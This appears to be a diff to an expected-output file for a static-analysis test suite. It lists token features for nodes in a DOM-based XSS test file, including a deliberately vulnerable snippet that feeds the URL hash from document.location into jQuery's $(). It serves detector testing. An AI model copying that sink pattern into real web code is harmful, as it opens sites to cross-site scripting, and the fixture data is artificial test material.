URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | exceptional return of new URL ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | exceptional return of new URL ... cation) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | exceptional return of new URL ... cation) | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | exceptional return of new URL ... cation) | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | exceptional return of new URL ... cation) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | new URL ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | new URL ... cation) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | new URL ... cation) | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | new URL ... cation) | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:341:12:341:37 | new URL ... cation) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:341:16:341:18 | URL | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:341:16:341:18 | URL | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:341:16:341:18 | URL | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:341:16:341:18 | URL | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:341:16:341:18 | URL | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:27 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:27 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:27 | document | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:27 | document | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:27 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:36 | document.location | CalleeFlexibleAccessPath | URL | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:36 | document.location | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:36 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:36 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:36 | document.location | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:36 | document.location | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:341:20:341:36 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:341:29:341:36 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:341:29:341:36 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:341:29:341:36 | location | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:341:29:341:36 | location | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:341:29:341:36 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:3 | $ | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:3 | $ | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | $(getUr ... ing(1)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | $(getUr ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | $(getUr ... ing(1)) | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | $(getUr ... ing(1)) | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | $(getUr ... ing(1)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | exceptional return of $(getUr ... ing(1)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | exceptional return of $(getUr ... ing(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | exceptional return of $(getUr ... ing(1)) | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | exceptional return of $(getUr ... ing(1)) | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:3:343:31 | exceptional return of $(getUr ... ing(1)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:10 | getUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:10 | getUrl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:10 | getUrl | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:10 | getUrl | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:10 | getUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | exceptional return of getUrl() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | exceptional return of getUrl() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | exceptional return of getUrl() | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | exceptional return of getUrl() | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | exceptional return of getUrl() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | getUrl() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | getUrl() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | getUrl() | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | getUrl() | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:12 | getUrl() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:17 | getUrl().hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:17 | getUrl().hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:17 | getUrl().hash | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:17 | getUrl().hash | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:17 | getUrl().hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:27 | getUrl( ... bstring | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:27 | getUrl( ... bstring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:27 | getUrl( ... bstring | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:27 | getUrl( ... bstring | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:27 | getUrl( ... bstring | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | exceptional return of getUrl( ... ring(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | exceptional return of getUrl( ... ring(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | exceptional return of getUrl( ... ring(1) | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | exceptional return of getUrl( ... ring(1) | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | exceptional return of getUrl( ... ring(1) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | getUrl( ... ring(1) | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | getUrl( ... ring(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | getUrl( ... ring(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17291,6 +120163,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | getUrl( ... ring(1) | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | | autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | getUrl( ... ring(1) | enclosingFunctionName | hash | | autogenerated/Xss/DomBasedXss/tst.js:343:5:343:30 | getUrl( ... ring(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:14:343:17 | hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:14:343:17 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:343:14:343:17 | hash | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:14:343:17 | hash | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:14:343:17 | hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:343:19:343:27 | substring | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:343:19:343:27 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:343:19:343:27 | substring | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:343:19:343:27 | substring | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:343:19:343:27 | substring | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:343:29:343:29 | 1 | CalleeFlexibleAccessPath | getUrl().hash.substring | | autogenerated/Xss/DomBasedXss/tst.js:343:29:343:29 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:343:29:343:29 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17298,6 +120180,97 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:343:29:343:29 | 1 | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | | autogenerated/Xss/DomBasedXss/tst.js:343:29:343:29 | 1 | enclosingFunctionName | hash | | autogenerated/Xss/DomBasedXss/tst.js:343:29:343:29 | 1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:347:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:347:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:347:0 | this | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:347:0 | this | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:347:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | 'arguments' object of function growl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | 'arguments' object of function growl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | 'arguments' object of function growl | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | 'arguments' object of function growl | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | 'arguments' object of function growl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | exceptional return of function growl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 